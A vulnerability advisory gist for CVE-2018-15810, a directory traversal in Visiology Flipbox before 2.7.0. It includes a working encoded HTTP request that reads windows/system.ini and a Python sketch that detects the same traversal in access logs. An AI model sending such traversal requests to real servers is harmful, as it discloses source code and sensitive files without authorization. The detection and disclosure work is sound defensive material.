@nenf nenf/CVE-2018-15810
Last active Feb 9, 2019

[Description]
Visiology Flipbox Software Suite before 2.7.0 allows directory
traversal via %5c%2e%2e%2f because it does not sanitize filename
parameters.
------------------------------------------
[Vulnerability Type]
Directory Traversal
------------------------------------------
[Vendor of Product]
Visiology
------------------------------------------
[Affected Product Code Base]
Flipbox - < 2.7
------------------------------------------
[CVE Impact Other]
Source code disclosure, sensitive information disclosure
------------------------------------------
[Attack Vectors]
An attacker can send the following HTTP request:
GET /%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2fwindows%2fsystem%2eini HTTP/1.1
Host: x.x.x.x
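
The request above decodes to `/\../\../\../\../windows/system.ini`, so a filter that looks for a literal `../` in the raw target, or that splits only on `/`, does not see a `..` segment. The following detection sketch is an added example, not code from the vendor or the gist author; the function names, the log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Either separator counts: Windows treats "\" like "/" when resolving a path.
SEPARATORS = re.compile(r"[\\/]+")
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Request target quoted in the [Attack Vectors] section of this advisory.
PAGE_TARGET = ("/%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2f%5c%2e%2e%2f"
               "windows%2fsystem%2eini")

def naive_has_traversal(target: str) -> bool:
    """Weak check: looks for a literal "../" in the raw request target."""
    return "../" in target

def has_traversal(target: str, max_decodes: int = 3) -> bool:
    """Decode percent-escapes (repeatedly, to catch double encoding),
    split on both separators, and flag any ".." path segment."""
    path = target.split("?", 1)[0]
    for _ in range(max_decodes):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return any(segment == ".." for segment in SEPARATORS.split(path))

def flag_requests(log_lines):
    """Return the request targets in access-log lines that contain traversal."""
    hits = []
    for line in log_lines:
        match = REQUEST_LINE.search(line)
        if match and has_traversal(match.group(1)):
            hits.append(match.group(1))
    return hits

# Constructed sample log lines (hypothetical combined-log format, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Feb/2019:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.11 - - [09/Feb/2019:10:00:01 +0000] "GET ' + PAGE_TARGET + ' HTTP/1.1" 200 219',
    '192.0.2.12 - - [09/Feb/2019:10:00:02 +0000] "GET /docs/v1..2/notes.txt HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for target in flag_requests(SAMPLE_LOG):
        print("traversal:", target)
```

The same decode-then-split logic belongs in the server's own filename handling, applied before the path is joined to the document root.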
------------------------------------------
[Has vendor confirmed or acknowledged the vulnerability?]
true
------------------------------------------
[Reference]
http://flipbox.net/news/620/